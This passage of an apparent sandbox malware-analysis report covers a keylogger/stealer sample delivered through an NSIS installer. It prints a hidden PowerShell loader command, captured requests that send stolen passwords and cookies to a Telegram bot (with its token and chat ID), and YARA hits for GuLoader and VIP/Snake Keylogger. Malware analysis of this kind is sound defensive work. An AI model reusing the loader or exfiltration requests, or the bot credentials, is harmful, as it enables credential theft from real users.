cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1678&rtt_var=647&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1669525&cwnd=207&unsent_bytes=0&cid=98d7c0b4ba4cec1a&ts=452&x=0"
2024-12-24 10:28:52 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49962	149.154.167.220	443	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:28:54 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20and%20Time:%2025/12/2024%20/%2010:58:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20114127%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-24 10:28:54 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 24 Dec 2024 10:28:54 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-24 10:28:54 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49980	149.154.167.220	443	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:29:01 UTC	342	OUT	POST /bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070006284&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd2558e4eafe83 Host: api.telegram.org Content-Length: 580
2024-12-24 10:29:01 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 35 38 65 34 65 61 66 65 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 74 69 6e 61 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 31 34 31 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 34 2f 31 32 2f 32 30 32 34 20 2f 20 30 35 3a 32 38 3a 32 34 0d 0a Data Ascii: --------------------------8dd2558e4eafe83Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:114127Date and Time: 24/12/2024 / 05:28:24
2024-12-24 10:29:02 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 24 Dec 2024 10:29:02 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-24 10:29:02 UTC	520	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 37 39 35 38 33 39 38 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 61 67 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 61 67 67 6f 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 37 30 30 30 36 32 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 4b 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 50 65 72 65 7a 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 70 65 72 65 7a 79 34 35 35 34 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 35 30 33 36 31 34 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 Data Ascii: {"ok":true,"result":{"message_id":32,"from":{"id":8179583980,"is_bot":true,"first_name":"Pago","username":"Paggo_Bot"},"chat":{"id":6070006284,"first_name":"KK","last_name":"Perezy","username":"perezy4554","type":"private"},"date":1735036142,"document":{"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49990	149.154.167.220	443	7192	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 10:29:05 UTC	372	OUT	POST /bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070006284&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd2581d8da2c05 Host: api.telegram.org Content-Length: 1277 Connection: Keep-Alive
2024-12-24 10:29:05 UTC	1277	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 38 31 64 38 64 61 32 63 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 74 69 6e 61 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 31 34 31 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 34 2f 31 32 2f 32 30 32 34 20 2f 20 Data Ascii: --------------------------8dd2581d8da2c05Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies \| user \| VIP Recovery PC Name:114127Date and Time: 24/12/2024 /
2024-12-24 10:29:06 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 24 Dec 2024 10:29:05 GMT Content-Type: application/json Content-Length: 531 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-24 10:29:06 UTC	531	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 37 39 35 38 33 39 38 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 61 67 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 61 67 67 6f 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 37 30 30 30 36 32 38 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 4b 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 50 65 72 65 7a 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 70 65 72 65 7a 79 34 35 35 34 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 35 30 33 36 31 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 Data Ascii: {"ok":true,"result":{"message_id":33,"from":{"id":8179583980,"is_bot":true,"first_name":"Pago","username":"Paggo_Bot"},"chat":{"id":6070006284,"first_name":"KK","last_name":"Perezy","username":"perezy4554","type":"private"},"date":1735036145,"document":{"

Target ID:	0
Start time:	05:27:04
Start date:	24/12/2024
Path:	C:\Users\user\Desktop\Technonomic.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Technonomic.exe"
Imagebase:	0x400000
File size:	777'472 bytes
MD5 hash:	C174A412BE6F74C3323AE8D6D4737086
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:27:05
Start date:	24/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Spookological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd';$Transporterede=$Spookological.SubString(26028,3);.$Transporterede($Spookological) "
Imagebase:	0xcc0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:27:05
Start date:	24/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:28:08
Start date:	24/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x660000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2620412422.00000000258F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2598654434.000000000651E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	23.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.4%
Total number of Nodes:	1357
Total number of Limit Nodes:	45

Executed Functions

Function 004033B6 Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004033D8
GetVersion.KERNEL32 ref: 004033DE
#17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040342E
OleInitialize.OLE32(00000000), ref: 00403435
SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403451
GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 00403466
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Technonomic.exe",00000000), ref: 00403479
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Technonomic.exe",00000020), ref: 004034A0

Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004035DB
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004035EC
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035F8
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040360C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403614
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403625
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040362D
DeleteFileW.KERNELBASE(1033), ref: 00403641

Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190

OleUninitialize.OLE32(?), ref: 0040370C
ExitProcess.KERNEL32 ref: 0040372E
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Technonomic.exe",00000000,?), ref: 00403741
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Technonomic.exe",00000000,?), ref: 00403750
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Technonomic.exe",00000000,?), ref: 0040375B
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Technonomic.exe",00000000,?), ref: 00403767
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403783
DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 004037DD
CopyFileW.KERNEL32(C:\Users\user\Desktop\Technonomic.exe,00420F08,00000001), ref: 004037F1
CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 0040381E
GetCurrentProcess.KERNEL32(00000028,?), ref: 0040384D
OpenProcessToken.ADVAPI32(00000000), ref: 00403854
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403869
AdjustTokenPrivileges.ADVAPI32 ref: 0040388C
ExitWindowsEx.USER32(00000002,80040002), ref: 004038B1
ExitProcess.KERNEL32 ref: 004038D4

Strings

SETUPAPI, xrefs: 00403411
TEMP, xrefs: 00403620
Low, xrefs: 0040360E
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033CC
.tmp, xrefs: 00403755
TMP, xrefs: 00403628
1033, xrefs: 0040363C
C:\Users\user\AppData\Local\Temp\, xrefs: 004035D0, 004035D5, 004035EB, 004035F7, 00403606, 00403613, 0040361F, 00403627, 0040373E, 0040374F, 0040375A, 00403766, 00403773, 00403782, 00403833
USERENV, xrefs: 00403407
~nsu, xrefs: 00403739
C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 004035BE, 004036DE, 00403789, 00403793
C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable, xrefs: 004036E9
Error launching installer, xrefs: 004036C3
NSIS Error, xrefs: 00403457
\Temp, xrefs: 004035F2
"C:\Users\user\Desktop\Technonomic.exe", xrefs: 0040346C, 00403472, 00403669
C:\Users\user\Desktop\Technonomic.exe, xrefs: 004037EC
SeShutdownPrivilege, xrefs: 00403863
UXTHEME, xrefs: 004033FD
C:\Users\user\Desktop, xrefs: 00403760, 00403765, 00403792

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\Technonomic.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\magmaet\clenched$C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable$C:\Users\user\Desktop$C:\Users\user\Desktop\Technonomic.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
API String ID: 3586999533-2641074325
Opcode ID: f3ecbdcc9d2ddf88f0db60c94208847800fabd89ade3af92fca17dc4b9b4c2fd
Instruction ID: 382b60f40ca78a79eaa77c6fd6579f97e3273799caf5780a05f3f86dc88dff68
Opcode Fuzzy Hash: f3ecbdcc9d2ddf88f0db60c94208847800fabd89ade3af92fca17dc4b9b4c2fd
Instruction Fuzzy Hash: 1DD11771200300BBD7207F659D09A2B3EADEB4070AF15843FF885B62D2DB7D9956876E

Function 00405421 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040547F
GetDlgItem.USER32(?,000003EE), ref: 0040548E
GetClientRect.USER32(?,?), ref: 004054CB
GetSystemMetrics.USER32(00000002), ref: 004054D2
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F3
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405504
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405517
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405525
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405538
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555A
ShowWindow.USER32(?,00000008), ref: 0040556E
GetDlgItem.USER32(?,000003EC), ref: 0040558F
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559F
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B8
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C4
GetDlgItem.USER32(?,000003F8), ref: 0040549D

Part of subcall function 0040427C: SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A

GetDlgItem.USER32(?,000003EC), ref: 004055E1
CreateThread.KERNELBASE(00000000,00000000,Function_000053B5,00000000), ref: 004055EF
CloseHandle.KERNELBASE(00000000), ref: 004055F6
ShowWindow.USER32(00000000), ref: 0040561A
ShowWindow.USER32(?,00000008), ref: 0040561F
ShowWindow.USER32(00000008), ref: 00405669
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040569D
CreatePopupMenu.USER32 ref: 004056AE
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C2
GetWindowRect.USER32(?,?), ref: 004056E2
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FB
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405733
OpenClipboard.USER32(00000000), ref: 00405743
EmptyClipboard.USER32 ref: 00405749
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405755
GlobalLock.KERNEL32(00000000), ref: 0040575F
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
GlobalUnlock.KERNEL32(00000000), ref: 00405793
SetClipboardData.USER32(0000000D,00000000), ref: 0040579E
CloseClipboard.USER32 ref: 004057A4

Strings

{, xrefs: 00405687
H7B, xrefs: 0040570F

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: H7B${
API String ID: 590372296-2256286769
Opcode ID: 64a521bccca9f5caed772c9a5003e4b30c68140e3a7fe85c050ebaedb87b4aa9
Instruction ID: 2c7cb92300b087b9ae130e103e133312d6144c84674811722de124f1f1f34f09
Opcode Fuzzy Hash: 64a521bccca9f5caed772c9a5003e4b30c68140e3a7fe85c050ebaedb87b4aa9
Instruction Fuzzy Hash: 16B13770900608FFDF119F60DD899AE7B79FB08354F40847AFA45A62A0CB758E52DF68

Function 004061A5 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Completed,?,00405319,Completed,00000000,00000000,00000000), ref: 00406268
GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004062E6
GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 004062F9
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406335
SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406343
CoTaskMemFree.OLE32(?), ref: 0040634E
lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406372
lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405319,Completed,00000000,00000000,00000000), ref: 004063CC

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 004062B4
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040636C
: Completed, xrefs: 004061CF, 004062AF, 004062D0, 004062E5, 004062F8, 00406314, 0040633F, 00406371, 00406377, 00406391, 004063A5, 004063C5, 004063CB, 004063D7, 0040640A
Completed, xrefs: 004061CA

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-905382516
Opcode ID: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
Instruction ID: 0f73e779dd6c4db66e797802c36dad016b528f10de9f6072c808280cb7245e7c
Opcode Fuzzy Hash: bef7a9cb1f259f829c94a4570d8a9b9bb83f0db893824e0baf2e821e2216e9af
Instruction Fuzzy Hash: 9361F271A00105EBDB209F25CD41AAE37A5AF50314F16807FFD46BA2D0D73D89A2CB9D

Function 00405974 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

